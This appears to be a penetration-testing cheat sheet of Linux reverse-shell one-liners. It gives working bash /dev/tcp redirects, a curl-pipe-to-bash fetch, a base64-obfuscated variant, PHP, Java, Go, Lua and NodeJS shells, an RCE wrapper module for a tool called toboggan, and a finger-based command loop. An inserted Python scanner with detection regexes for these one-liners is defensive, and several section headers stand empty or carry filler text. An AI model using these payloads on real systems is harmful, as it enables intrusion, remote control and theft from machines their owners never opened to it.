```bash
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done

#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0
```
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.
Symbol safe shell
```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
Shell explanation
- bash -i: This part of the command starts an interactive (-i) Bash shell.
- >&: This part of the command is shorthand for redirecting both standard output (stdout) and standard error (stderr) to the same destination.
- /dev/tcp/<ATTACKER-IP>/<PORT>: This is a special file representing a TCP connection to the specified IP address and port.
- By redirecting the output and error streams to this file, the command effectively sends the output of the interactive shell session to the attacker's machine.
- 0>&1: This part of the command redirects standard input (stdin) to the same destination as standard output (stdout).
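The redirection pattern explained above (`bash -i`, `>&`, `/dev/tcp/...`, `0>&1`) and the base64-staged variant in the previous block are also what a defender looks for in process telemetry. The following is an added example, not code from the original page: a small Python scanner that applies indicator patterns for the one-liners documented here to process command lines and, for the `echo <b64> | base64 -d | bash` staging, decodes the blob and scans the decoded stage as well. The sample records are constructed for the example; the record ids, indicator names and the `SAMPLE_RECORDS` list are assumptions of this example and not part of any real telemetry format.

```python
import base64
import binascii
import re

# Indicator patterns for the reverse-shell one-liners documented on this page
# (bash /dev/tcp redirection, nc -e, PHP fsockopen + exec, Lua socket + os.execute).
# Each is applied to a single process command line, e.g. from auditd EXECVE or EDR telemetry.
INDICATORS = [
    ("dev-tcp-udp-redirect", re.compile(r"/dev/(tcp|udp)/[\w.<>-]+/[\w<>-]+")),
    ("interactive-shell-redirect", re.compile(r"\b(ba)?sh\s+-i\b.*[<>&]")),
    ("netcat-exec", re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh")),
    ("php-socket-exec", re.compile(r"fsockopen\(.*?\).*?(exec|proc_open)\(")),
    ("lua-socket-shell", re.compile(r"socket\.tcp\(\).*(os\.execute|io\.popen)")),
]

# "echo <b64> | base64 -d | bash" staging, as used by the page's stealthier method.
B64_STAGE = re.compile(
    r"echo\s+([A-Za-z0-9+/=]{8,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh"
)


def decode_staged_base64(cmdline: str):
    """Return the decoded payload if the command pipes an echoed base64 blob into a shell, else None."""
    m = B64_STAGE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_command(cmdline: str) -> list:
    """Names of the indicators that fire on a command line, including on its decoded base64 stage."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    decoded = decode_staged_base64(cmdline)
    if decoded is not None:
        hits.append("base64-staged-command")
        hits += ["decoded:" + name for name, rx in INDICATORS if rx.search(decoded)]
    return hits


# Constructed sample telemetry (not real captures): (record id, command line).
# rec-2 carries the base64 blob shown on this page; rec-5 decodes to the benign "date".
SAMPLE_RECORDS = [
    ("rec-1", "bash -i >& /dev/tcp/10.8.4.185/4444 0>&1"),
    ("rec-2", "echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null"),
    ("rec-3", "php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"),
    ("rec-4", "nc 10.10.14.2 6767 -e /bin/bash"),
    ("rec-5", "echo ZGF0ZQo= | base64 -d | bash"),
    ("rec-6", "ls -la /var/www/html"),
]


def scan_records(records) -> dict:
    """Map record id -> indicator hits, keeping only records that fired at least one indicator."""
    report = {}
    for rec_id, cmdline in records:
        hits = scan_command(cmdline)
        if hits:
            report[rec_id] = hits
    return report


if __name__ == "__main__":
    for rec_id, hits in scan_records(SAMPLE_RECORDS).items():
        print(rec_id, ", ".join(hits))
```

The decode step matters because the raw command line of rec-2 contains none of the literal indicators; only the decoded stage reveals the `/dev/tcp` redirection. rec-5 shows the trade-off: a base64-staged command is flagged on its own, but without any decoded indicator it ranks lower than a decoded stage that also matches.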
When dealing with a Remote Code Execution (RCE) vulnerability within a Linux-based web application, achieving a reverse shell might be obstructed by network defenses such as iptables rules or intricate packet filtering mechanisms. In such constrained environments, an alternative approach involves establishing a PTY (Pseudo Terminal) shell to interact with the compromised system more effectively.
A recommended tool for this purpose is toboggan, which simplifies interaction with the target environment.
To use toboggan effectively, create a Python module tailored to the RCE context of your target system. For example, a module named nix.py could be structured as follows:
```python
import jwt
import httpx


def execute(command: str, timeout: float = None) -> str:
    # Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
    token = jwt.encode(
        {"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
    )
    response = httpx.get(
        url="https://vulnerable.io:3200",
        headers={"Authorization": f"Bearer {token}"},
        timeout=timeout,
        # ||BURP||
        verify=False,
    )
    # Check if the request was successful
    response.raise_for_status()
    return response.text
```
And then, you can run:
```bash
toboggan -m nix.py -i
```
to directly leverage an interactive shell. You can add -b for Burpsuite integration and remove -i for a more basic rce wrapper.
How the payload is sent (headers? data? additional information?)
Then, you can just send commands or even use the upgrade command to get a full PTY (note that pipes are read and written with an approximate 1.3 seconds delay).
Telnet is a network protocol used for communication over a network. It can be used to log in remotely to a computer system or another device.
Perl is a programming language that can be used effectively as shellcode on Linux systems. It can be used to create sockets, read and write files, and perform other system operations. Perl can be a good choice for writing shellcode because of its ability to work with strings and pointers easily.
PHP is a programming language widely used for web development. It can be used to build server-side applications that are able to execute operating system commands. Typically, PHP can execute operating system commands using shell_exec, exec, system, passthru, popen, proc_open, pcntl_exec, backticks, and shell functions. PHP can therefore be used as part of an intrusion attack chain to execute operating system commands.
```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
Java
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
Golang is a programming language created by Google. It is known for its efficiency and ease of use.
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
Lua
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
NodeJS
```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```
or
```javascript
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
```
or
```javascript
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
```
or
```javascript
// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
```
or
```javascript
// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');
```
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
OpenSSL
Attacker (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
```
Payload
Typically, you want to maintain shell access on the victim's computer system. This lets you carry out further attack steps. There are several ways to obtain a shell on the victim's system, including:
- Reverse Shells: These are types of shells that let the victim's computer connect to your computer, rather than the other way around.
- Web Shells: These are small programs placed on a web server that can be used to control the victim's computer system through a web browser.
- Local Shells: These are types of shells that are available directly on the victim's computer, often through remote control.
Each type of shell has its advantages and can be used depending on the environment and the goals of your attack.
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null)`; sleep 1; done
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
Gawk
Gawk is an implementation of the Awk language. It can be used as part of a toolchain for performing data analysis on Unix systems. Gawk is easy to use on the command line to help filter, parse, and process data automatically.